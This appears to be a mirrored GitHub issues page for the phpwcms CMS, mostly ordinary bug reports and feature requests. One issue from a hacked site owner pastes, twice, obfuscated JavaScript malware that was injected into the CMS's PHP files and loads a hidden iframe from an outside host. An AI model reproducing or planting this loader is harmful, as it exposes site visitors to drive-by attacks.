Giter Club home page Giter Club logo

phpwcms's People

Contributors

fbatista72 avatar geckse avatar marcus-at-localhost avatar pagetest avatar phalancs avatar q23 avatar slackero avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

phpwcms's Issues

Vorlagenauswahl für CP Bilder(imagetable) bleibt auf Standard!

Bei der Auswahl von CP Bilder ist die Auswahlmöglichkeit nur auf Standard beschränkt. Ich habe mehrfach versucht, dort ein neues Template einzufügen, welches in der Auswahl aber nicht auftaucht. Die Änderung des STANDARDtemplate wird aber akzeptiert.
Stand der phpwcms-Version: 20.12. 17:45

cpbilder

custom_settings.php no longer working?

it seems that
/template/inc_settings/template_default/custom_settings.php
/template/inc_settings/template_default/MY_any_settings.php
is not working anymore. it says 'Will overwrite default settings of config file', but doesn't.

for example:

Code:
$template_default['article']['imagelist_default_width'] = 400;
$template_default['article']['imagelist_default_height'] = 400;

i never get the value '400' for any listing images {and all others}.
even when i'm deleting the default values [clearing input fields and click save].

yes, i know that you can select/apply custom settings in:
a) ADMIN --> templates --> edit template and
b) ADMIN --> site structure

i'm using the latest git.

this issue was mentioned here:
http://forum.phpwcms.org/viewtopic.php?f=1&t=23906

BIG problem with: template/inc_cntpart/newsletter/email/default.opt-in.txt

THIS IS URGENT!
There is only ONE single template for the double-opt-in procedure:
template/inc_cntpart/newsletter/email/default.opt-in.txt

I mentioned already here http://forum.phpwcms.org/viewtopic.php?f=16&t=20190#p125227

The problem: I forgot about. But any time, when you update your web site, this file will be overwritten. Any changes that you've made are lost. This happened since many weeks and I didn't noticed because I didn't remembered. As a consequence of this, since many weeks all subscribers receive the default message, instead the customized template.

Pull Jquery from Google vioa https

I wanted to secure my page via ssl and came across no scripts were working anymore. This was due to the fact that by default jquery from google is pulled via http and not https which results in this behavior.

This should be fixed somehow.

RSS Feed CP with Image

could you please implement a {IMAGE} RP for the RSS items?

it's basically something like this in include/inc_front/content/cnt22.article.inc.php
Line: ~164

$rss['item_thumbnail'] = array();
if ($enclosure = $rssvalue->get_enclosure())
{
    $rss['item_thumbnail'] = (array) $enclosure->get_thumbnails();
}
$rss['items'][$c] = render_cnt_template($rss['items'][$c], 'IMAGE', $rss['item_thumbnail'][0] );

and in the template something like this:

[IMAGE]<img width="40" height="40" src="{IMAGE}" />[/IMAGE]

Thanks!

Contentpart "Ext. Content" Bug

Wenn ich bei "Herkunft:" "Eigene Pfad/Datei oder URL" auswähle wird der eingetragene Pfad bei "Datei/URL" nicht mehr gespeichert.
Mit der Version 1.6.522 ging das noch. Nach dem Update auf 1.7.0 nicht mehr.
Auch eine neu installierte 1.7.0 hat das gleiche Problem.

Edit: Das schließende /html am Ende von lokal eingebundenen HTML-Dateien wird auch nicht entfernt.

Add Rewrite Functionality for News

Since news articles use the same Pool of available aliases, the can also be rewritten like normal articles if slashes in rewrite are enabled.

example.com/%newsarticle%/%my_news%

instead of

example.com/%newsarticle%&newsdetail=XXXXXXXX-YY_%my_news%

deleted image files will not be deleted

When you delete an image and when you click > admin > remove delete files, this certain image won't be deleted. It was not moved into /filearchive/can_be_deleteted

CP Text with Image > Div instead Table

In my opinion, this CP should remain as table based CP. Because when DIV-based, the image column left does not adjust automatically to the width of the used image.

In the core template, the image column has a fixed width of 35%. For example, if the width of the content is 800px and the image is only 80px, then the image column has a width of more than 240px. The gap between image and text is about 160px. Too much.

As much as I prefere DIV layouts, in this case, tables should be used for a more flexible usage of this contentpart.

CP text w/image colums

affected: include/inc_front/content/cnt1.article.inc.php

when i use 'position table left/right' i get perfect rearranged columns. but the problem is, that i can't css the columns, like e.g. bootstrap needs.

for example:
/template/inc_cntpart/imagetext/something.tmpl
...formatted like WIN.INI...
class_column_left = imgtxt-column-left span4

will get:
div class="imgtxt-column-left span4">
div class="imgtxt-column-left span4-text" /div
div class="imgtxt-column-left span4-image" /div
/div

but need something like:
div class="imgtxt-column-left NO_SPAN">
div class="imgtxt-column-left-text span4" /div
div class="imgtxt-column-left-image span4" /div
/div

PROBLEM:

  • can't specify CSS/SPAN_x each column
  • can't break up the wrapper
  • can't insert custom classes

IMG alt tag doesnt do captiontext anymore

I've noticed that the img content part does not display the correct alt tag anymore but always the filename as alt-tag. (r528)

Example :

www.trcmotors.nl

porsche-wit.jpg

image

Abilty to supply custom alt tags with images would be ... a feature request ;-) Using the right image name would also be better for seo and indexing althoughg i understand the implecations of that for the system itself.

NAV_LIST_UL: problem with ul class="something"

Funktion Anzeige aller verfügbaren IDs beim erstellen von Links im BE

Was echt sehr hilfreich für Redakteure wäre, ist ein Button im BE, mit dem eine Liste aller verlinkbaren IDs angezeigt werden kann(Popup o.ä.). Sodass beim Erstellen eines internen Links nachgeschaut werden kann, welche ID ein Menüpunkt oder wahlweise ein Artikel hat. Diese sind durch Struktur und Titel ersichtlich.
Relevant ist das bei fast allen CPs und den News. Der Button kann also z.B. auf der linken Seite unter News eingesetzt werden. Schwierig ist es nur bei dem "Linkdialog" im CKeditor, da müsste er ja ähnlich wie "Server durchsuchen" platziert sein.

Ajax & Render Clean HTML

if the new option
$phpwcms['render_clean_html']
is active the

code for calling ajax content is gone.

CP: Tabs fixed to FCKeditor

Loading CP Tabs produces an error when loading the WYSIWYG, since it seems to be fixed to fckeditor. I use CK as default, so there should not be that error at all.

Version: 1.6.522

Fehler bei Einbinden von Bild (Table) mittels {SHOW_CONTENT...} ins HTML-Template.

Das Einstellen von CP Bild-Table im HTML-Template (ADMIN) mittels {SHOW_CONTENT ...} erzeugt eine Fehlermeldung, wenn im CP-Bilder-Table der Haken in Tabelle[x] nicht gesetzt ist. Beim Setzen des Haken ist der Spuk vorbei.

Notice:
Undefined variable: image_border in /home/www/webXXX/html/meineSeite/include/inc_front/img.func.inc.php on line 482 Notice:
Undefined variable: image_imgclass in /home/www/webXXX/html/meineSeite/include/inc_front/img.func.inc.php on line 482.

phpwcms has holes??? we have been hacked twice now... we updated everything to newest version, removed all malware code...again

can you help us how to protect or what we can do. otherwise we just change cms...
here is the infiltrated javascript code...

please help!!!!!
thankyou very much...

files infected are:
backend.default.php
module.default.php
index.php
login.php

xect=document;tej="spl"+"i"+"t";iriiih=window;ihd="0"+"x";fdkso=(5-3-1);try{--(xect["body"])}catch(yvkc){dmb=false;try{}catch(twxvd){dmb=21;}if(1){mvfuss="17:5d:6c:65:5a:6b:60:66:65:17:58:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:58:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:58:71:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:67:69:66:70:5c:5a:6b:66:5f:58:59:60:6b:58:6b:5b:5c:63:5c:66:65:25:66:69:5e:26:5a:63:62:25:67:5f:67:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:27:2f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:27:2f:67:6f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:27:2f:67:6f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:27:2f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:27:2f:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:71:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:58:71:53:1e:17:5a:63:58:6a:6a:34:53:1e:58:71:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:71:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:58:71:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:58:71:27:30:1f:20:32:4:1:74:4:1:74"tej;}iriiih=mvfuss;emsjse=[];for(ztalbi=22-20-2;-ztalbi+1379!=0;ztalbi+=1){pik=ztalbi;if((0x19==031))emsjse+=String.fromCharCode(eval(ihd+iriiih[1*pik])+0xa-fdkso);}flnpuw=eval;flnpuw(emsjse)}

xect=document;tej="spl"+"i"+"t";iriiih=window;ihd="0"+"x";fdkso=(5-3-1);try{--(xect["body"])}catch(yvkc){dmb=false;try{}catch(twxvd){dmb=21;}if(1){mvfuss="17:5d:6c:65:5a:6b:60:66:65:17:58:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:58:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:58:71:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:67:69:66:70:5c:5a:6b:66:5f:58:59:60:6b:58:6b:5b:5c:63:5c:66:65:25:66:69:5e:26:5a:63:62:25:67:5f:67:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:27:2f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:27:2f:67:6f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:27:2f:67:6f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:27:2f:1e:32:4:1:17:58:71:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:27:2f:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:71:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:58:71:53:1e:17:5a:63:58:6a:6a:34:53:1e:58:71:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:71:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:58:71:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:58:71:27:30:1f:20:32:4:1:74:4:1:74"tej;}iriiih=mvfuss;emsjse=[];for(ztalbi=22-20-2;-ztalbi+1379!=0;ztalbi+=1){pik=ztalbi;if((0x19==031))emsjse+=String.fromCharCode(eval(ihd+iriiih[1*pik])+0xa-fdkso);}flnpuw=eval;flnpuw(emsjse)}

Bug in: include/inc_front/content/cnt1.article.inc.php

1.6.530 (2013/03/18, r530)

Lines 146-155:
Case 9 definition is "Tabelle, links". Should be "Tabelle, rechts"

Lines 157-166
Case 8 definition is "Tabelle, rechts. Should be "Tabelle, links"

Case 8 (table, left)
At the moment, it renders first the text div followed by the image div. Should render first image div followed by text div.

Screen Shot 2013-03-25 at 4 52 42

Add CP Support for Shop

It would be more comfortable if the Shop would not needed to be integrated via RTs but via a content part with the options: Cart, CatList, Product Detail etc.

Bodyjs improvement

Hi,
the new bodyjs feature is very much appreciated.
One thing that I dislike is, that bodyjs only grabs registered inline Javascript in templates, in phpwcms' own notion like this

<!-- JS: $('#slider').do(function(){
   var='x';
}); -->

It's not possible to write complex JS without syntax highlighting, since it's off for HTML comments (in my editor). And I don't want to add those comment tags later when I am "finishing" the project, since some are never finished.

I like to write

<script>
   $('#slider').do(function(){
      var='x';
   });
</script>

in my templates.

For now I use a frontend_render script to transform my plain <script> into phpwcms to be parsed later.

/* grab all inline scripts and turn it to PHPWCMS internal <!-- JS: --> notion */
if(!empty($phpwcms['js_in_body'])) {
    if(preg_match_all('#<script\b[^>]*>(.*?)</script>#si', $content['all'], $match))
    {
        foreach($match[1] as $k => $js){
            $match[1][$k] = "<!-- JS:  {$js} -->";
        }
        $content['all'] = str_replace($match[0],$match[1],$content['all']);
    }
}

Maybe this is something to consider?

I also wish there is a way to force certain custom JS to be in the head (like modernizr). As far as I understand this is only the case for phpwcms included libs like html5shiv, response.js and a few others.

Thanks for the steady improvement of phpwcms!
m.

Can't create Tags/ Schlagworte

In r575 and less its not possible to create tags in news or main article section. i'm able to reproduce this on different server. No error ouput is given by apache.

Article base data - reduce view

The article base data screen should not have so many input-fields.

Title, subtitle and the textarea are enough, The rest should only be visible on clicking a "settings" or "more" link. Most of the times it is not necessary to edit those values. The default view should be editable in the users profile.

Functions in Admin BE doesnt work

After updating from r514 to r526 all works great except 'Seitenlayout' and 'Vorlagen' in BE. No error in logfile or on page. cant find the reason. please help.
Unbenannt

More class definitions

Based on comment

Thanks!
But one step to get >>More custom classes<< is still missing.
Many --> image links for modern css frameworks require that you can add e.g.

  1. --> a href class >ABC_something< or
  2. --> img class >XYZ_something<

with ---> the common {image} tag that is used in ---> nearly all templates you can't do it.
you can break up the standard by using cmsimage.php but you still get and have many problems.

the phpwcms standard is:
div
{image}
/div

{image} is rendering [by default/script/internal/no hack]
a img
but you CAN'T include any custom classes to A or IMG.

the DIV wrapper outside is helpful but you must rewrite and add styles to your css files.
THAT'S WHY THERE IS NO CSS FRAMEWORK ON THE WORLD THAT CAN BE APPLIED EASILY!

it would be a great advantage when you could add custom classes INTO/WITHIN -->> {image}

  1. to the A -tag
  2. to the IMG -tag
    when using --any-- IMG content part

result could/should be:
a href class="MY_ABC"
img src class="MY_XYZ"
/a

All empty folders gone

It seems like all empty folders are gone since the project moved to github. Anyways, those are important to have:

For instance:
template/inc_cntpart/bulletlist
template/inc_cntpart/imagetext

template/inc_cntpart/ has 27 folders in r519 and 23 folders in r521

Let Modules add URL's to the sitemap.php

now it reads just the 'config/phpwcms/sitemap.custom.ini' into the sitemap.
would be nice to have a check for a similar file in every module or - even better - to look in a certain directory (content/tmp) for uniqe named files, so the module (or phpwcms) can add/write in these files.

remove safe_mode check on setup

Remove the php safe_mode check on setup for php versions greater than or equal 5.4.0.
/setup/inc/step0.inc.php lines 85 - 100

CKeditor issues

General: The drag-expand arrow on the bottom right allows only the vertical resizing of the editing area. Horizontal scrolling possible when mouse supports horizontal scrolling.

Soruce Mode: drag-expand of the editing area not possible. Horizontal scrolling not possible. Only visible source code can be edited. Source code which gets cut off on the right side can't be edited.

Source Mode Fullscreen: Horizontal scrolling not possible. Only visible source code can be edited. Source code which gets cut off on the right side can't be edited.

Mehrfach-Dateiupload

In der Masterversion 1.6.531 wird beim Mehrfach-Dateiupload im Safari-Browser die Meldung "xxx.jpg ist leer. Diese Datei bitte auslassen" angezeigt. Bei allen anderen Browser der neusten Version ist alles ok. Ein Einzelbild kann aber mit dem Mehrfach- Dateiupload ohne Fehler hochgeladen werden.

rewrite und print ==>> HTML CP

Wenn ich rewrite eingeschaltet habe und im Template das hier unterbringe:

<a href="[PHP]echo FE_CURRENT_URL[/PHP]&print=1" class="footer-tools-print" title="diese Seite drucken"></a>

dann bekomme ich einen Link

http://www.....trum.de/verpflegungskonzept.html&print=1

Der führt mich auf ein "not found".
Ohne rewrite geht es prima.
Mache ich was falsch oder.....

In Verbindung mit highlight und News gibt es weitere Komplikationen.
http://www.......trum.de/.html?newsdetail=20131009-7_nacht-der-lieder&highlight=lieder
Edit: es fehlte ein ID-Eintrag für die Suche in den News!!

Nun zeigt sich, dass der CP HTML & amp; abspeichert, aber & anzeigt und der Print-Link iO ist. Nochmaliges Abspeichern überschreibt dann das & amp; in der DB und der Print-Link ist kaputt (s.o.)

See also: http://forum.phpwcms.org/viewtopic.php?p=140841#p140844

==>> Also reduziert sich der Inhalt meiner Eingabe auf den Fakt, dass "etwas" mit dem CP HTML nicht iO ist...

sql upgrade script is horrible

i've just tried to update from Release 1.1-RC4 22-06-2004 to latest (1.6.531)

the sql upgrade took me about 3 hours, cause many statements are in more than one file.
please check in the file (http://codeviewer.org/view/code:39e4), maybe this one helps someone

after all the work was done, i've imported the the init_410 script into a new DB, made an export and compared the two structures.
it isn't still the same, but it should be ?
http://codeviewer.org/view/code:39e5

Feat. wish: CP Form - Change field order via drag and drop

For changing order of the form fiels (especially when many fields used), the change of the field order by drag and drop would be more comfortable than moving the fields with up/down arrows. I am thinking about the same function as used in CP Images (special).

CP: form - {LABEL:%FIELDNAME%} does not create proper label tag

Expected output when using custom option and custom template in form CP and using a tag like {LABEL:%FIELDNAME%}

< la be l f or="%FIELDNAME%">%FIELDLABEL%< / lab el> [ignore spaces, otherwise tag is erased here]

Actual output is a plain:

%FIELDLABEL%

__

Insonsistent because {%FIELDNAME%} properly creates a whole tag:

JS lib's not loading

it seems, that none of the preselectable libraries will be loaded anymore.
e.g

does not

initJSPlugin('jd.gallery'); does not
[PHP]
initJSLib();
[/PHP] does not

{image:

Know that replacement tag {image: is depreceated. but even if depreceated functions are enabled in config.php all {image-RTs arent renderd properly.

{IMAGE_URL} in CP Images special empty

Hi,

in v1.6.531 {IMAGE_URL} in CP Images special seems to be empty.
I have entered a URL in CP but there is no output.

Template:
[TITLE]<p>[IMAGE_URL]<a href="{IMAGE_URL}" target="_blank"><b>&raquo;</b> [/IMAGE_URL]{TITLE}[IMAGE_URL]</a>:[/IMAGE_URL] &nbsp;{ALT}</p>[/TITLE]

(from wiki)

CP:
Caption: Link-Text|Link-Alt
URL: http://example.com

Output:
<p>Link-Text &nbsp;Link-Alt</p>

A little help would be nice, THX...

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.